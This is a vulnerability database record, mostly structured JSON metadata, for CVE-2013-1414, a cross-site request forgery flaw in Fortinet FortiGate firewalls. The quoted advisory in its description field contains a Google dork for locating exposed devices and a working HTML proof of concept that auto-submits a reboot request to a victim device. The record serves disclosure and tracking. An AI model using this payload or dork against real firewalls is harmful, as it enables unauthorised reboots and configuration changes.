var-201307-0030
Vulnerability from variot
Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2
Description
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.
Requirements
An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device.
Report-Timeline:
Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed
Google Dork:
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
Sven Wurth dos@net-war.de
PoC
This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability.
CSRF - Proof Of Concept
End Poc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201307-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "fortios", "scope": "eq", "trust": 1.9, "vendor": "fortinet", "version": "5.0.1" }, { "model": "fortios", "scope": "eq", "trust": 1.9, "vendor": "fortinet", "version": "5.0" }, { "model": "fortios", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": "4.3.10" }, { "model": "fortios", "scope": "eq", "trust": 1.1, "vendor": "fortinet", "version": "5.0.2" }, { "model": "fortigate-100d", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-110c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3140b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigaterugged-100c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-800c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3040b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-600c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-40c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-60c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-200b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-311b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001a-sw", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-300c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3810a", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "lte", "trust": 1.0, "vendor": "fortinet", "version": "4.3.12" }, { "model": "fortigate-3240c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-50b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5020", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3950b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5060", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5140b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-310b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-1240b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5101c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-20c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-1000c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-voice-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-620b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-110c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-1240b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-300c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3140b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-600c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-100d", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3950b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-200b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-1000c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5020", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001a-sw", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-620b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-50b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3240c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-20c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3040b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-800c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-80c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "lt", "trust": 0.8, "vendor": "fortinet", "version": "5.x" }, { "model": "fortigate-5060", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-voice-80c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-310b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3810a", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5101c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-40c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-311b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-60c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate rugged-100c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5140b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.6, "vendor": "fortinet", "version": "4.3.12" }, { "model": "fortios b0630", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios b0537", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "fortigate-60c", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.0" }, { "model": "fortigate-100d", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "fortigate-1000", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.00" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.6" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.5" }, { "model": "fortigate 800f", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "800" }, { "model": "fortigate 620b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 60m", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "60" }, { "model": "fortigate 50am", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 50a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 500a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "500" }, { "model": "fortigate 400a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "400" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3950" }, { "model": "fortigate 3810a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 3600a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3600" }, { "model": "fortigate 311b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 310b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 3016b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 300a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "300" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.00" }, { "model": "fortigate 224b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 200b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 200a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "200" }, { "model": "fortigate 1240b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 100a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 1000afa2", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 1000a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "100" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "4.3.13" } ], "sources": [ { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fortinet:fortios:5.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fortinet:fortios:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.3.12", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fortinet:fortios:4.3.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-3040b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-3240c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5001b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-80c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-40c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-20c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-110c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-voice-80c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-1240b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-300c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5020:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-3950b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-311b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-310b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-800c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5001a-sw:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5101c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-600c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-200b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-100d:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5060:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-3810a:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-60c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-50b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-620b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigaterugged-100c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-1000c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-5140b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:fortinet:fortigate-3140b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1414" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sven Wurth", "sources": [ { "db": "BID", "id": "60861" }, { "db": "PACKETSTORM", "id": "122216" } ], "trust": 0.4 }, "cve": "CVE-2013-1414", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.1, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2013-1414", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-61416", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-1414", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201307-116", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-61416", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414\nVulnerability Type: CSRF (Cross-Site Request Forgery)\nProduct: All Fortigate Firewalls\nVendor: Fortinet http://www.fortinet.com\nVulnerable Version: \u003c 4.3.13 \u0026 \u003c 5.0.2\n \nDescription\n==========\nBecause many functions are not protected by CSRF-Tokens, it\u0027s possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. \n \nRequirements\n===========\nAn Attacker needs to know the IP of the device. \nAn Administrator needs an authenticated connection to the device. \n \n \nReport-Timeline:\n================\nVendor Notification: 11 July 2012\nVendor released version 5.0.2 / 18 March 2013\nVendor released version 4.3.13 / 29 April 2013\nStatus: Fixed\n \nGoogle Dork:\n==========\n -english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"\n \n \nCredit:\n=====\nSven Wurth dos@net-war.de\n \n \nPoC\n====\n \nThis Example will reboot a Fortinet Firewall. \nThis is just one of many possibilities to attack this vulnerability. \n \n##### CSRF - Proof Of Concept ####\n\u003chtml\u003e\n\u003cbody onload=\"submitForm()\"\u003e\n\u003cform name=\"myForm\" id=\"myForm\"\n action=\"https://###_VICTIM_IP_###/system/maintenance/shutdown\" method=\"post\"\u003e\n \u003cinput type=\"hidden\" name=\"reason\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"1\"\u003e\n \u003cinput type=\"submit\" name=\"add\" value=\"rebootme\"\u003e\n\u003c/form\u003e\n\u003cscript type=\u0027text/javascript\u0027\u003edocument.myForm.submit();\u003c/script\u003e\n\u003c/html\u003e\n##### End Poc #####\n \n \n \n \n \n \n", "sources": [ { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "BID", "id": "60861" }, { "db": "VULHUB", "id": "VHN-61416" }, { "db": "PACKETSTORM", "id": "122216" } ], "trust": 2.07 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61416", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1414", "trust": 2.9 }, { "db": "EXPLOIT-DB", "id": "26528", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2013-003232", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201307-116", "trust": 0.7 }, { "db": "BID", "id": "60861", "trust": 0.4 }, { "db": "PACKETSTORM", "id": "122216", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-80159", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61416", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "id": "VAR-201307-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61416" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:58:07.720000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "FortiGate\u30a2\u30d7\u30e9\u30a4\u30a2\u30f3\u30b9", "trust": 0.8, "url": "http://www.fortinet.co.jp/products/fortigate/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003232" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/26528/" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414" }, { "trust": 0.3, "url": "https://www.fortinet.com/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1414" }, { "trust": 0.1, "url": "http://www.fortinet.com" }, { "trust": 0.1, "url": "https://###_victim_ip_###/system/maintenance/shutdown\"" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-08T00:00:00", "db": "VULHUB", "id": "VHN-61416" }, { "date": "2013-06-28T00:00:00", "db": "BID", "id": "60861" }, { "date": "2013-07-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "date": "2013-06-28T22:13:39", "db": "PACKETSTORM", "id": "122216" }, { "date": "2013-07-08T17:55:02.783000", "db": "NVD", "id": "CVE-2013-1414" }, { "date": "2013-07-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-08T00:00:00", "db": "VULHUB", "id": "VHN-61416" }, { "date": "2013-06-28T00:00:00", "db": "BID", "id": "60861" }, { "date": "2013-07-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "date": "2013-07-08T17:55:02.783000", "db": "NVD", "id": "CVE-2013-1414" 